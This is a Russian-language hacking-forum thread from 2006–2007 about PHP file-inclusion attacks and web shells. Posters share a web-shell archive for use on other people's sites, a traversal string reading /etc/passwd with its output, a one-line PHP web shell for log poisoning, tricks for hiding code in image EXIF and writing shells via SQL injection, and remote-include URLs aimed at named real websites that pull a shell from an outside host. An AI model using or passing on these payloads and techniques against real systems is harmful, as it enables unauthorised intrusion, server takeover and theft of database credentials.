ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

11.08.2006, 11:24
|
|
Познающий
Регистрация: 05.07.2006
Сообщений: 93
Провел на форуме: 260548
Репутация:
18
|
|
хм...... лан... пасиб....
|
|
|

11.08.2006, 23:22
|
|
Познавший АНТИЧАТ
Регистрация: 07.05.2006
Сообщений: 1,031
Провел на форуме: 5885100
Репутация:
773
|
|
BlackDog веб шелл ето скрипт чаще на PHP для управления своим\чужим сайтом\сервером.
шеллы можеш запускать на чужиш сайтах через php-ij (как ето делается я попоробовал обьясить ТУТ )
изучай!!!!
Вот скачай етот АРХИВ там подборка веб шеллов на любой вкус. Удачи
Последний раз редактировалось Zitt; 12.08.2006 в 04:31..
|
|
|

29.08.2006, 16:24
|
|
Новичок
Регистрация: 29.08.2006
Сообщений: 4
Провел на форуме: 10593
Репутация:
0
|
|
хм...вот что у меня выводится в адресную строку http://blablabla:82/?mod=lookbook
Вот код функции которая производит инклуд
PHP код:
function std_execute_mod( $mod_name, $mod_function )
{
$mod_name = str_replace( '.php', '', $mod_name );
require_once( $GLOBALS['g_dir_mod'] . $mod_name . '.php' );
eval( '$out=' . $mod_name . '_' . $mod_function . ';' );
return $out;
}
$GLOBALS['g_dir_mod'] - тут папка mod
можно ли как-то сделать пхп инъекцию?
|
|
|

28.01.2007, 21:31
|
|
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
Провел на форуме: 668286
Репутация:
187
|
|
http://www.eurogym.ru/index.php?lang_id=0&content_id=+11&p_content_id=0& sitemap=0&extfilename=http://www.google.com
гы...
осваиваемся потихоньку =)
|
|
|

26.08.2007, 01:35
|
|
Banned
Регистрация: 03.08.2007
Сообщений: 7
Провел на форуме: 11215
Репутация:
-21
|
|
Панки, залилть вы можете расказат ькак? Я только вижу шел который работает через их инклуд, на моем сервере шел. Я хочу залить на их.
|
|
|

14.11.2007, 01:05
|
|
Познающий
Регистрация: 17.06.2007
Сообщений: 39
Провел на форуме: 197892
Репутация:
11
|
|
Статья прикольная. У меня вопрос вот например я увидел на форуме вот такой "php injection" - http://блаблабла/main.php?page=../../../../etc/passwd%00
Открываю и вижу: ../../../../etc/passwdroot:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lpx:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var//mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0  perator:/root:/sbin/nologin
И еще очень много таково.
Насколько я понимаю, то мы зашли в корневую директорию сайта, перешли в папку "etc" и открыли файл "passwd". Если ошибаюсь то поправьте. Но я не понял что мы увидели в этом файле??? Разъясните пожалуйста.
|
|
|

14.11.2007, 02:53
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме: 5939734
Репутация:
1917
|
|
Я уже отвечал на этот вопрос на форуме, вобщем применительно к локальному инклюду вот:
Смысл в том, что /etc/passwd есть на любой nix-ОС и если получилось его заинклюдить (как вариант прочитать), то значит как минимум локальный инклюд есть (я не беру вариант с опенбэйздир) и не надо подбирать путьк нему, т.к. при любом (большом) количестве /../ ты всеравно его прочитаешь (потому что выше рута / не прыгнешь), а дальше все, что подскажет тебе воображение...
например есть локальный инклюд, ты можешь:
1) прочитать и использовать passwd файл для брута по маске login:login (к тому же узнать путь к домашним директориям пользователей, иногда очень нужно)
2) узнав методом перебора стандартных путей путь к логам апача, ты можешь намеренно вызвать ошибку, записать к примеру в error_log php код а потом этот error_log проинклюдить (заметь локально) и соответственно этот код выполнить (например элементарный веб-шелл <?php system($_GET[cmd]); ?>)
3) если на сайте есть возможность заливки картинок, то ты можешь вставить php код в gif или в Exif данные jpeg картинки, а потом с помошью все того же локального инклюда выполнить этот код (проинклюдив картинку)
4) Есть у тебя к примеру SQL инъекция и у пользователя БД есть права filepriv, но ты не можешь записать шелл т.к. незнаешь путей, или нет ни одной паки доступной из веба с правами на запись, в первом случае ты можешь прочитать файл httpd.conf (если найдешь, и если будут права на чтение) и узнать пути, хотя это можно сделать и через sql-inj, при втором варианте ты пишешь свой шелл в /tmp и с помощью локального инклюда подцепляешь свой шелл из /tmp
5) куча вариантов, насколько фантазии хватит
Если есть просто читалка файлов, то ты можешь посмотреть файлы конфигурации на сайте и узнать пароль и пользователя БД (обычно они в незашифрованном виде)
__________________
Карфаген должен быть разрушен...
|
|
|

14.11.2007, 10:52
|
|
Banned
Регистрация: 06.06.2006
Сообщений: 944
Провел на форуме: 3986705
Репутация:
1403
|
|
то мы зашли в корневую директорию сайта, перешли в папку "etc" и открыли файл "passwd".
Не в корневую директорию сайта а сервера, в данном случае это *Nix Os (как сказал Scipio)
|
|
|

21.11.2007, 20:38
|
|
Новичок
Регистрация: 21.11.2007
Сообщений: 4
Провел на форуме: 25817
Репутация:
0
|
|
у меня вопрос по Web-shell.
Я использую Web-shell CIH.[ms] открываю его с помощю php-injection.
Но при попытке чтото зделать шел просто перезагружаеться и не выполняет никаких команд =( (_http://www.an-invest.ru/?id=http://poni-shell.nm.ru/sss) Можете подсказать вчем проблема ? буду очень благодарен.
|
|
|

21.11.2007, 20:49
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме: 9098076
Репутация:
4303
|
|
Попробуй другой шелл
У меня всё нормально
|
|
|
|
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
Books PHP
|
FRAGNATIC |
PHP |
186 |
21.02.2010 02:41 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|